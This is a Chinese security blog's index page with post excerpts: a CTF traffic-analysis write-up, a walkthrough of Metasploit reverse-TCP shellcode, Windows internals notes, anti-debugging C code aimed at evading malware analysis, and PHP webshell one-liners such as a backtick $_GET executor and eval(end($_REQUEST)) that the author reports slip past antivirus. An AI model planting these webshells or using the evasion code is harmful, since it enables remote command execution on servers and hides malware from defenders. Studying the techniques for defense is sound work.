陇剑杯wp

签到题

使用wireshark打开下载下来的‘Good.pcapng’流量包

1.1此时正在进行的可能是__协议的网络攻击(http,dns,ftp)

打开流量包发现总共有ARP HTTP Tcp等协议,没有发现ftp,dns包,所以可以认为是http攻击

image-20210921104316921

more >>

展开全文 >>

ShellCode含义解析

简介

当我们使用MSF生成payload的时候,会生成如下图这样的形式:

image-20221126215648281

这个16进制的数据其实由三个方面组成:

block_api.asm,block_reverse_tcp,block_recv

源码可以附在github上这里看:

https://github.com/rapid7/metasploit-framework/tree/master/external/source/shellcode/windows/x64/src/block

接下来我们依次进行分析

block_api

我们都知道Shellcode是可以直接放在内存里面就相当于执行了,但是一般的应用程序放在内存里需要IAT(导入表)这个东西,所以Shellcode也需要这么一个部分用来找寻API函数,使他可以在内存里面执行。

image-20221126220609057

首先Rdx这里是一个TEB结构体。而Rdx+x60又是一个结构体,叫做PEB。

image-20221126220832472

在PEB这个字典里面又有一个叫做LDR的东西,它是一个信息结构。

我们使用LDR主要是去找kernel32.dll里面的函数。(这种加载函数的方式是没有导入表的情况下,手动去寻找API的方式)。

后面一大段都是为了找寻里面的函数和函数地址,相当于是作者自己写了个方法找函数。

block_reverse_tcp

image-20221126221435363

接下来第二段是想要去建立一个连接,首先去找到windows的一个lib库:ws2_32。这个东西在自己电脑里面也可以搜索到:

image-20221126221601021

如果你想用这个东西,你需要一个叫做WSadata的结构体,并且在后面需要一个叫做WSAStartup的函数,这个是c语言写socket的方法。

image-20221126221826720

接下来这一点是为了将地址和端口写入进去:

image-20221126221900053

image-20221126221937202

image-20221126222042243

image-20221126222054057

然后通过小段序的方式可以看出对应的端口和ip地址。所以以后其实分析MSFshellcdoe的时候,可以注意看这一个地方。(最后的2000表示的是家族序列AF_INET)

image-20221126222457246

接下来就是创建一个socket对象,并且进行连接,就像python里面的socket.socket

block_recv

连接成功之后,MSF服务端会向客户端传回来一个二进制文件Meterpreter(相当于加强版的powershell)。

所以shellcode首先会采用接受方法Recv,用于接受传过来的数据。

image-20221126222702232

之后会用virtualloc函数来创建内存空间。

image-20221126222755543

将recv的东西挨个挨个加进去

image-20221126222902916

有空间有内容,最后只需要执行就可以了,于是最后收尾进行一个jmp跳转:

image-20221126222944242

这样就成功完成加载了Shellcode。

展开全文 >>

Windows系统架构

Windows系统架构

操作系统模型

在大多数用户操作系统中,应用程序与操作系统本身是隔离的:操作系统代码在内核模式下执行,可以访问系统数据和硬件,应用程序代码运行在用户模式下,只有有限的接口可以使用,对系统数据访问受限,无法直接访问硬件。当用户模式的程序调用系统服务时,处理器会执行一条特殊指令,将发出调用的线程切换至内核模式。当系统服务完毕后,操作系统会将该线程的上下文重新切回到用户模式,让调用方继续运行。

more >>

展开全文 >>

Windows进程和作业

Windows进程和作业

本章将介绍Windows在处理进程和作业时涉及的数据结构和算法。首先概括介绍进程的创建过程,随后介绍进程的内部结构,接下来还会介绍进程保护机制,以及受保护进程和不受保护进程的区别。

3.1 创建进程

windowsAPI提供了很多用于创建进程的函数,其中最简单的就是CreateProcess该函数会尝试使用与创建者相同的访问令牌新建一个进程。如果需要不同的令牌,可以使用CreateProcessAsUser函数,该函数可以接受一个额外的参数(第一个参数),即已经通过其他方式(如调用LogonUser函数)获取的令牌对象句柄。

more >>

展开全文 >>

免杀之反调试

反调试

反调试的意义

反调试技术,恶意代码用它识别是否被调试,或者让调试器失效。恶意代码编写者意识到分析人员经常使用调试器来观察恶意代码的操作,因此他们使用反调试技术尽可能地延长恶意代码的分析时间。为了阻止调试器的分析,当恶意代码意识到自己被调试时,它们可能改变正常的执行路径或者修改自身程序让自己崩溃,从而增加调试时间和复杂度。很多种反调试技术可以达到反调试效果。

反调试相关函数

IsDebuggerPresent()

这是恶意代码中使用最高的反调试函数,是在win32API里面的应用层函数。

1
BOOL IsDebuggerPresent();

image-20221030134932179

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
#include <windows.h>
#include <stdio.h>
BOOL CheckDebug()
{
	return IsDebuggerPresent();
}
int main() 
{
	if (CheckDebug())
	{
		printf("a");
		//exit(0);
	}
	else
	{
		printf("b");
		//shellcodeloader();
	}
    return 0;
}

正如以上描述,如果存在调试的环境,就输出A,如果不是调试的环境,就会输出B。

该函数原理:

image-20221030135722934

我们知道OD和其他动态调试器的原理都是通过附加到另一个进程上使用windows的debug机制去进行调试,而IsDebuggerpresent函数本来就是该debug机制的一个函数,它负责查看这个环节中函数返回的值是否为0用来判断是否是调试环境。

效果展示:如果在vs中直接使用本地windows调试器方法去运行,便会出现a。

image-20221030140101608

而直接在命令行中去执行

image-20221030140215849

CheckRemoteDebuggerPresent()

1
2
3
4
5
6
7
8
9
10
11
12
13
14
BOOL CheckRemoteDebuggerPresent(
  [in]      HANDLE hProcess,
  [in, out] PBOOL  pbDebuggerPresent
);

参数
[in] hProcess
进程的句柄。
[in, out] pbDebuggerPresent
如果正在调试指定的进程,则函数设置为 TRUE 的变量的指针,否则为 FALSE 。
    
返回值
如果该函数成功,则返回值为非零值。
如果函数失败,则返回值为零。 要获得更多的错误信息,请调用 GetLastError。

该函数不仅可以检测自己是否正在被debug,还可以检测其他任意句柄是否被debug。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
BOOL CheckDebug1()
{
	BOOL ret;//定义了一个布尔类型的变量
	CheckRemoteDebuggerPresent(GetCurrentProcess(), &ret);//变量就有地址,这个api函数就可以找到这个地址直接在地址里面写true还是false
	return ret;//直接返回变量的值就是刚才修改的内容
}
int main()
{
	if (CheckDebug1())
	{
		printf("a");
	}
	else
	{
		printf("b");
	}
}

它会把结果传输给一个布尔变量的指针,往这个地址里面直接写true或者false,用来判断是否是调试环境。

效果展示:

image-20221030140918860

NtQueryInformationProcess

NtQueryInformationProcess是ntdll.dll里面的函数,所以要想调用这个函数,是比较麻烦的,需要loadlibrarygetprocaddress

1
2
3
4
5
6
7
__kernel_entry NTSTATUS NtQueryInformationProcess(
  [in]            HANDLE           ProcessHandle,
  [in]            PROCESSINFOCLASS ProcessInformationClass,
  [out]           PVOID            ProcessInformation,
  [in]            ULONG            ProcessInformationLength,
  [out, optional] PULONG           ReturnLength
);

https://learn.microsoft.com/zh-cn/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess

最关键的是参数中

image-20221030141919465

用来检测是否是调试器环境。(如果是非0的值,就表示有一个调试器。)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
bool NtQueryInformationProcessApproach()

{

    int debugPort = 0;

    HMODULE hModule = LoadLibrary(TEXT("Ntdll.dll "));

    NtQueryInformationProcessPtr NtQueryInformationProcess = (NtQueryInformationProcessPtr)GetProcAddress(hModule, "NtQueryInformationProcess");

    if (NtQueryInformationProcess(GetCurrentProcess(), (PROCESSINFOCLASS)7, &debugPort, sizeof(debugPort), NULL)) 
    {

        printf("[ERROR NtQueryInformationProcessApproach] NtQueryInformationProcess failed\n");
    }
    else
    {
        return debugPort == -1;
    }

    return false;

}

int main()
{
    if (NtQueryInformationProcessApproach())
    {
        printf("a");
    }
    else
    {
        printf("b");
    }
}

大致的意义就是将这个函数里面的值取出来放在定义的debugPort变量中。用来检测是否是调试器环境。

效果展示:

image-20221030142533101

运用调试器的异常接管来判断

image-20221030143131130

当没有调试器的时候,我们关闭一个不存在的进程,错误会自动交给windows操作系统,但是如果在有调试器的情况下,当系统报错时,会将报错交给调试器。同时这个就是调试器的原理,OD的普通断点就是使用int3报错的方式来下的断点。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include <windows.h>
#include <stdio.h>
BOOL CheckDebug()
{
    DWORD ret = CloseHandle((HANDLE)0x1234);
    //SetLastError
    if (ret != 0 || GetLastError() != ERROR_INVALID_HANDLE)
    {
        return TRUE;
    }
    else
    {
        return FALSE;
    }
}


int main() 
{
    if (CheckDebug())
    {
        printf("a");
    }
    else
    {
        printf("b");
    }
}

image-20221030143428587

内核级调试的反调试

不同于OD等,windbg是内核级调试器。这种内核级调试器同样有内核级的反调试手段。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#include "kernelmode_antidbg.h"
#include <iostream>
#include "connector.h"
#ifdef __cplusplus
extern "C" {
#endif 




#define KUSER_SHARED_VA 0x7FFE0000
#define KUSER_SHARED_SIZE 0x3B8
 //_KUSER_SHARED_DATA
    inline bool is_kuser_shared_mapped()
    {
        if (IsBadReadPtr((BYTE*)KUSER_SHARED_VA, KUSER_SHARED_SIZE)) {
            std::cerr << "KDB: Failed to retrieve KUSER_SHARED_DATA\n";
            return false;
        }
        return true;
    }

    // from Hidden Bee malware:
    t_kdb_mode is_kernelmode_dbg_enabled() {
        const ULONGLONG KdDebuggerEnable_offset = 0x2d4;
        if (!is_kuser_shared_mapped()) {
            return KDB_UNKNOWN;
        }
        BYTE* KdDebuggerEnable = (BYTE*)(KUSER_SHARED_VA + KdDebuggerEnable_offset);
       
        if (*KdDebuggerEnable) {
            if (*KdDebuggerEnable == 3) {
                std::cout << "KDB: Remote enabled!\n";
                //windbg双机调试 一台虚拟机作为被调试的对象 一台机器作为调试结果查看的机器
                return KDB_REMOTE_ENABLED;
            }
            std::cout << "KDB: Local enabled!\n";
            return KDB_LOCAL_ENABLED;
        }
        std::cout << "KDB: Disabled\n";
        return KDB_DISABLED;
    }

#ifdef __cplusplus
}
#endif

原理:

image-20221030145508438

在32位下,KUSER_SHARED_VA 0x7FFE0000这段内存是一个内核层和用户层都能访问的内存段。而在偏移量2d4这个位置,也就是0x7FFE02d4这个位置,会有一个关于是否是内核级调试器的标志位,这就是问题的关键,通过这个标志位置,可以知道是否是在调试环境中。

image-20221030145851200

因为没有用windbg,所以可以检测出来是disabled的。

进程名称查看是否在调试环境

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
#include <winternl.h>
BOOL CheckDebug()
{
    DWORD ID;
    DWORD ret = 0;
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE)
    {
        return FALSE;
    }
    BOOL bMore = Process32First(hProcessSnap, &pe32);
    while (bMore)
    {
        if (_stricmp(pe32.szExeFile, "OllyDBG.EXE") == 0 || _stricmp(pe32.szExeFile, "OllyICE.exe") == 0 || _stricmp(pe32.szExeFile, "x64_dbg.exe") == 0 || _stricmp(pe32.szExeFile, "windbg.exe") == 0 || _stricmp(pe32.szExeFile, "ImmunityDebugger.exe") == 0)
        {
            return TRUE;
        }
        bMore = Process32Next(hProcessSnap, &pe32);
    }
    CloseHandle(hProcessSnap);
    return FALSE;
}
int main() 
{
    if (CheckDebug())
    {
        printf("a");
    }
    else
    {
        printf("b");
    }
}

这个很明显,就是比对一下任务管理器中有不有进程名字与这几个调试器的名字相同。

image-20221030150208316

GetTickCount

这个也是逻辑上的检测方式,执行三条指令,看程序的执行时间来看是不是调试环境。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <windows.h>
#include <stdio.h>
BOOL CheckDebug()//就到这里来了
{
    DWORD time1 = GetTickCount();
    __asm
    {
        mov     ecx, 10
        mov     edx, 6
        mov     ecx, 10
    }
    DWORD time2 = GetTickCount();
    if (time2 - time1 > 0xA)
                           
    {
        return TRUE;
    }
    else
    {
        return FALSE;
    }
}

int main() //入口点
{
    if (CheckDebug())//肯定是这个
    {
        printf("a");
    }
    else
    {
        printf("b");
    }
    return 0;

image-20221030151539004

TLS加载器

TLS就是在运行主函数之前,就运行一段程序的机制。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

#include <stdio.h>  
#include <windows.h>  

void NTAPI __stdcall TLS_CALLBACK1(PVOID DllHandle, DWORD dwReason, PVOID Reserved);

#ifdef _M_IX86  
#pragma comment (linker, "/INCLUDE:__tls_used")  
#pragma comment (linker, "/INCLUDE:__tls_callback")  
#else  
#pragma comment (linker, "/INCLUDE:_tls_used")  
#pragma comment (linker, "/INCLUDE:_tls_callback")  
#endif  
EXTERN_C
#ifdef _M_X64  
#pragma const_seg (".CRT$XLB")  
const
#else  
#pragma data_seg (".CRT$XLB")  
#endif  

PIMAGE_TLS_CALLBACK _tls_callback[] = { TLS_CALLBACK1,0 };
#pragma data_seg ()  
#pragma const_seg ()  

#include <iostream>  

void NTAPI __stdcall TLS_CALLBACK1(PVOID DllHandle, DWORD Reason, PVOID Reserved)
{
    if (IsDebuggerPresent())
    {
        exit(0);
    }
    else
    {
        MessageBox(NULL,"aaaaaaaa","bbbbbbbb",0);
    }
}

int main(int argc, char* argv[])
{
    printf("233\n");
    return 0;
}

即在程序运行main前就会报异常

image-20221030151941214

自动下断点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include <windows.h>
#include <stdio.h>
BOOL CheckDebug()
{
    __try
    {
        __asm int 3
    }
    __except (1)
    {
        return FALSE;
    }
    return TRUE;
}

int main() 
{
    if (CheckDebug())
    {
        printf("a");
    }
    else
    {
        printf("b");
    }
    return 0;
}

它使用汇编语言自动写一个int3断点,如果你在调试器环境,那么就会被调试器接管,如果说你用od去调试他,就会发现他会退出,如果是正常环境就不管。

image-20221030152534715

补充项目

https://github.com/MrH1TM4N86/Al-Khaser-Master

这个项目里面包含了各种各样的反调试手段和代码,可以用于借鉴。

展开全文 >>

PHP下的几种免杀Webshell

重音符下的PHP

在PHP中,当你写一个集合等于一个用重音符包裹的字符串的变量时,它将像在shell_exec()命令内一样被执行。

https://www.nuomiphp.com/eplan/437635.html。具体的原因我们也不深究,只需要知道它的功能就是可以执行命令,同时它的木马也很简单,只需要轻轻松松的一句话。

1
<?=`$_GET[1]`;

免杀效果也是杠杠的:

image-20221014160329227

也能够执行。

image-20221014160341372

使用类的Webshell

使用类的webshell是老生长谈的话题了。同样这个也能过掉火绒并且正常使用。

1
2
3
4
5
6
7
<?php
class test{
const name='eval(end($_REQUEST));';
}
eval(test::name);
?>

image-20221014161725215

使用PHP版本差异的方法

php 7.3.4的版本下,在;号下可以解析传过来的参数

1
2
3
4
5
6
<?=
$a=<<< aa
assasssasssasssasssasssasssasssasssasssasssassss
aa;echo `$_GET[1]`
?>

image-20221014161811974

展开全文 >>

安卓之贪吃蛇破解

smali结构

我们之前说过,安卓的dex文件存放的是开发者写的方法(即java代码)。而一个apk包经过反编译后,一个dex文件就会变成一个smali文件,当dex内的方法超过65535个,就会出现2个dex文件夹,即反编译会出现2个smali文件。

开发者开发时,一般会用com文件夹表示是作者自己写的代码。

more >>

展开全文 >>

安卓四大件

四大组件

安卓四大组件分别是活动(Activity),服务(Service),广播接收者(Broadcast Receive).内容提供者(Content Provider)

其作用分别是:

活动(Activity):用于表现功能

服务(Service):后台运行服务,不提供界面呈现

广播接收者(Broadcast Receive):用于接收广播

内容提供者(Content Provider):支持多个应用中存储和读取数据,相当于数据库。

more >>

展开全文 >>

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

<br><br>平荒尽处是春山<br>Life is a fucking movie.